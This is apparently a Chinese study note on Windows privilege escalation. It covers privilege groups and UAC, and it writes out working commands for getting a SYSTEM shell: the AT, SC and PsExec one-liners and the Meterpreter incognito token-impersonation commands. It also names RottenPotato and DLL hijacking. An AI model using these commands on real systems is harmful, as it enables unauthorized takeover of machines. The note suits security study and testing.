提权-Windows

windows

权限划分

• 普通权限
  • 管理员组（administrator）高权限用户组（Power users）普通用户组（users）来宾用户组（Guests）
• 特殊权限
  • SYSTEM（系统）、Trustedinstaller（信任模块）、everyone（所有人）

内核溢出漏洞提权：

通过信息收集当前版本和补丁情况下存在什么漏洞寻找exp利用

AT&SC&PS命令利用

• AT ：at 13:38 /interactive cmd.exe 适用范围 Windows2000、Windows 2003、Windows XP
• SC 适用范围： 适用于windows 7/8、03/08、12/16

sc Create syscmd binPath= "cmd /K start" type= own type= interact
sc start syscmd

• PS提权：需要下载pstools psexec.exe -accepteula -s -i -d cmd.exe 适用范围：Win2003 & Win2008

令牌窃取

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

进程注入

UAC提权

简介

UAC(User Account Control，用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。

UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前，拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证，以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。

在Windows Vista及以后的版本中，微软设置了安全控制策略，分为高、中、低三个等级。高等级的进程有管理员权限；中等级的进程有普通用户权限；低等级的进程，权限是有限的，以保证系统在受到安全威胁时造成的损害最小。

在权限不够的情况下，访问系统磁盘的根目录、Windows目录，以及读写系统登录数据库等操作，都需要经常UAC(User Account Control，用户账号控制)的认证。

UAC设置的四种方法

• 始终通知：这是最严格的设置，每当有程序需要使用高级别的权限时都会提示本地用户
• 仅在程序试图更改我的计算机时通知我：这是UAC的默认设置。当本地Windows程序要使用高级别的权限时，不会通知用户。但是，当第三方程序要使用高级别的权限时，会提示本地用户
• 仅在程序试图更改我的计算机时通知我(不降低桌面的亮度)：与上一条设置的要求相同，但在提示用户时不降低桌面的亮度
• 从不提示：当用户为系统管理员时，所有程序都会以最高权限运行

烂土豆提权：RottenPotato

DLL劫持